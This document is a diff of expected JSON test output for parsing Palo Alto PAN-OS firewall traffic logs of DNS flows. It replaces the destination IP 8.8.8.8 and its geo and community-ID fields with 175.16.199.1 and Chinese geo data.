@@ -6355,12 +6166,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24171", - "panw.panos.network.nat.community_id": "1:gHWCOTtilTTqOn7fOKh7zVq45Xw=", + "panw.panos.network.nat.community_id": "1:uD+W7tTSk79NUi3PpwMi06q1UWI=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091169, "panw.panos.source.interface": "ethernet1/2", @@ -6375,14 +6186,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 172, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -6407,17 +6218,18 @@ "client.nat.port": 28944, "client.packets": 1, "client.port": 49195, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 134, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -6431,7 +6243,7 @@ "event.end": "2018-11-30T16:09:13.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:13.000-02:00", "event.timezone": "-02:00", @@ -6443,12 +6255,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 27097, + "log.offset": 27407, "network.application": "dns", "network.bytes": 212, "network.community_id": [ - "1:OGDvpe1+4KQfCsxk0I61jm0+DIc=", - "1:WgGQfntwYS3voQPhGfI/qhx0SVk=" + "1:45Rl8R/9Ldlq3xqwvMO1f+V8LQA=", + "1:PTYX9HnjKczQum2EUlGgqrCBONE=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -6465,12 +6277,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24069", - "panw.panos.network.nat.community_id": "1:OGDvpe1+4KQfCsxk0I61jm0+DIc=", + "panw.panos.network.nat.community_id": "1:PTYX9HnjKczQum2EUlGgqrCBONE=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091170, "panw.panos.source.interface": "ethernet1/2", @@ -6485,14 +6297,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 134, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -6517,17 +6329,18 @@ "client.nat.port": 13415, "client.packets": 1, "client.port": 17266, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 179, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -6541,7 +6354,7 @@ "event.end": "2018-11-30T16:09:13.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:13.000-02:00", "event.timezone": "-02:00", @@ -6553,12 +6366,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 27546, + "log.offset": 27866, "network.application": "dns", "network.bytes": 252, "network.community_id": [ - "1:RM5edUgZPywM/hIejzFVba+A4co=", - "1:po/vy4RoD5WeFPgCZnduQkE47yY=" + "1:SePV/IDh1jjVyN5T4udJ8C1xa+I=", + "1:WZDvBFVegIhMMGv+nhAyDd8fRs0=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -6575,12 +6388,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24282", - "panw.panos.network.nat.community_id": "1:po/vy4RoD5WeFPgCZnduQkE47yY=", + "panw.panos.network.nat.community_id": "1:WZDvBFVegIhMMGv+nhAyDd8fRs0=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091171, "panw.panos.source.interface": "ethernet1/2", @@ -6595,14 +6408,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 179, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -6627,17 +6440,18 @@ "client.nat.port": 2489, "client.packets": 1, "client.port": 48631, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 218, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -6651,7 +6465,7 @@ "event.end": "2018-11-30T16:09:13.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:13.000-02:00", "event.timezone": "-02:00", @@ -6663,12 +6477,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 27995, + "log.offset": 28325, "network.application": "dns", "network.bytes": 308, "network.community_id": [ - "1:jJo7FJWI3gHbC96nTsyT17hVP98=", - "1:wIxYOe++IxscmxBcRwrPGEIlZF4=" + "1:p7bJDKhUeffJiJ7yfQZH2E44Dvs=", + "1:qcxcaTpyWF+yTo0gacaLCRvVTdc=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -6685,12 +6499,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 53,
 "panw.panos.destination.zone": "untrust",
 "panw.panos.endreason": "aged-out",
 "panw.panos.flow_id": "24218",
- "panw.panos.network.nat.community_id": "1:wIxYOe++IxscmxBcRwrPGEIlZF4=",
+ "panw.panos.network.nat.community_id": "1:qcxcaTpyWF+yTo0gacaLCRvVTdc=",
 "panw.panos.ruleset": "new_outbound_from_trust",
 "panw.panos.sequence_number": 32091172,
 "panw.panos.source.interface": "ethernet1/2",
@@ -6705,14 +6519,14 @@
 "PA-220"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.1.63",
- "192.168.15.224",
- "8.8.8.8"
+ "192.168.15.224"
 ],
 "rule.name": "new_outbound_from_trust",
 "server.bytes": 218,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 53,
 "server.packets": 1,
 "server.port": 53,
@@ -6737,17 +6551,18 @@
 "client.nat.port": 49328,
 "client.packets": 1,
 "client.port": 58540,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 172,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 53,
 "destination.packets": 1,
 "destination.port": 53,
@@ -6761,7 +6576,7 @@
 "event.end": "2018-11-30T16:09:13.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "event.outcome": "success",
 "event.start": "2018-11-30T16:09:13.000-02:00",
 "event.timezone": "-02:00",
@@ -6773,12 +6588,12 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 28443,
+ "log.offset": 28783,
 "network.application": "dns",
 "network.bytes": 249,
 "network.community_id": [
- "1:eWhg/7DfJGJNfW90sKt5WEYnI9g=",
- "1:xN7R3QI47jVAQhgJrOAvdsu+oes="
+ "1:JR/9wbsZU1i/WfnfKXg/pJ74JRA=",
+ "1:o5e7XAcaqhJxDKgm/3IDk32KJeg="
 ],
 "network.direction": "outbound",
 "network.packets": 2,
@@ -6795,12 +6610,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 53,
 "panw.panos.destination.zone": "untrust",
 "panw.panos.endreason": "aged-out",
 "panw.panos.flow_id": "24200",
- "panw.panos.network.nat.community_id": "1:xN7R3QI47jVAQhgJrOAvdsu+oes=",
+ "panw.panos.network.nat.community_id": "1:JR/9wbsZU1i/WfnfKXg/pJ74JRA=",
 "panw.panos.ruleset": "new_outbound_from_trust",
 "panw.panos.sequence_number": 32091173,
 "panw.panos.source.interface": "ethernet1/2",
@@ -6815,14 +6630,14 @@
 "PA-220"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.1.63",
- "192.168.15.224",
- "8.8.8.8"
+ "192.168.15.224"
 ],
 "rule.name": "new_outbound_from_trust",
 "server.bytes": 172,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 53,
 "server.packets": 1,
 "server.port": 53,
@@ -6847,17 +6662,18 @@
 "client.nat.port": 36036,
 "client.packets": 1,
 "client.port": 42678,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 305,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 53,
 "destination.packets": 1,
 "destination.port": 53,
@@ -6871,7 +6687,7 @@
 "event.end": "2018-11-30T16:09:13.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "event.outcome": "success",
 "event.start": "2018-11-30T16:09:13.000-02:00",
 "event.timezone": "-02:00",
@@ -6883,12 +6699,12 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 28892,
+ "log.offset": 29242,
 "network.application": "dns",
 "network.bytes": 379,
 "network.community_id": [
- "1:BxuDgAhR5Rh55XOXYnYF+6GKhps=",
- "1:dhAcAsMUxJrHfinQA5Q7eglS7T0="
+ "1:Bc4xJ7lD1NlCA/3AmAVsQNYES64=",
+ "1:h1oeveqcJzaFWRZabjDssyQizPo="
 ],
 "network.direction": "outbound",
 "network.packets": 2,
@@ -6905,12 +6721,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 53,
 "panw.panos.destination.zone": "untrust",
 "panw.panos.endreason": "aged-out",
 "panw.panos.flow_id": "24224",
- "panw.panos.network.nat.community_id": "1:BxuDgAhR5Rh55XOXYnYF+6GKhps=",
+ "panw.panos.network.nat.community_id": "1:Bc4xJ7lD1NlCA/3AmAVsQNYES64=",
 "panw.panos.ruleset": "new_outbound_from_trust",
 "panw.panos.sequence_number": 32091174,
 "panw.panos.source.interface": "ethernet1/2",
@@ -6925,14 +6741,14 @@
 "PA-220"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.1.63",
- "192.168.15.224",
- "8.8.8.8"
+ "192.168.15.224"
 ],
 "rule.name": "new_outbound_from_trust",
 "server.bytes": 305,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 53,
 "server.packets": 1,
 "server.port": 53,
@@ -6958,17 +6774,7 @@
 "client.packets": 1,
 "client.port": 16576,
 "destination.address": "66.28.0.45",
- "destination.as.number": 174,
- "destination.as.organization.name": "Cogent Communications",
 "destination.bytes": 527,
- "destination.geo.city_name": "Lanham",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 38.9705,
- "destination.geo.location.lon": -76.8388,
- "destination.geo.region_iso_code": "US-MD",
- "destination.geo.region_name": "Maryland",
 "destination.ip": "66.28.0.45",
 "destination.nat.ip": "66.28.0.45",
 "destination.nat.port": 53,
@@ -6996,7 +6802,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 29341,
+ "log.offset": 29701,
 "network.application": "dns",
 "network.bytes": 603,
 "network.community_id": [
@@ -7070,17 +6876,18 @@
 "client.nat.port": 45809,
 "client.packets": 1,
 "client.port": 39830,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 153,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 53,
 "destination.packets": 1,
 "destination.port": 53,
@@ -7094,7 +6901,7 @@
 "event.end": "2018-11-30T16:09:14.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "event.outcome": "success",
 "event.start": "2018-11-30T16:09:14.000-02:00",
 "event.timezone": "-02:00",
@@ -7106,12 +6913,12 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 29796,
+ "log.offset": 30156,
 "network.application": "dns",
 "network.bytes": 242,
 "network.community_id": [
- "1:KZzZcwEN4cbaTck1z2Wa/3P3YjU=",
- "1:MxVcaRP5Y1xyEiYiNsmO1lVcN+A="
+ "1:BOB9wtAfwP5+6JDPoEYJazGGY1w=",
+ "1:n7na652DSILYNbdII1evSRQ59uI="
 ],
 "network.direction": "outbound",
 "network.packets": 2,
@@ -7128,12 +6935,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 53,
 "panw.panos.destination.zone": "untrust",
 "panw.panos.endreason": "aged-out",
 "panw.panos.flow_id": "24183",
- "panw.panos.network.nat.community_id": "1:MxVcaRP5Y1xyEiYiNsmO1lVcN+A=",
+ "panw.panos.network.nat.community_id": "1:BOB9wtAfwP5+6JDPoEYJazGGY1w=",
 "panw.panos.ruleset": "new_outbound_from_trust",
 "panw.panos.sequence_number": 32091176,
 "panw.panos.source.interface": "ethernet1/2",
@@ -7148,14 +6955,14 @@
 "PA-220"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.1.63",
- "192.168.15.224",
- "8.8.8.8"
+ "192.168.15.224"
 ],
 "rule.name": "new_outbound_from_trust",
 "server.bytes": 153,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 53,
 "server.packets": 1,
 "server.port": 53,
@@ -7180,17 +6987,18 @@
 "client.nat.port": 3675,
 "client.packets": 1,
 "client.port": 6185,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 169,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 53,
 "destination.packets": 1,
 "destination.port": 53,
@@ -7204,7 +7012,7 @@
 "event.end": "2018-11-30T16:09:14.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "event.outcome": "success",
 "event.start": "2018-11-30T16:09:14.000-02:00",
 "event.timezone": "-02:00",
@@ -7216,12 +7024,12 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 30245,
+ "log.offset": 30615,
 "network.application": "dns",
 "network.bytes": 240,
 "network.community_id": [
- "1:LJ6ZkdUI9SYHDvi3B2Yn/9ILMbM=",
- "1:p8DU1xLXG63f/3s/r6ZKJcQo9u8="
+ "1:TgKht4IY3bXV7bhl2uE8yxyTVxc=",
+ "1:YkPur+uarfYMTJuYRe5QYRrH/es="
 ],
 "network.direction": "outbound",
 "network.packets": 2,
@@ -7238,12 +7046,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 53,
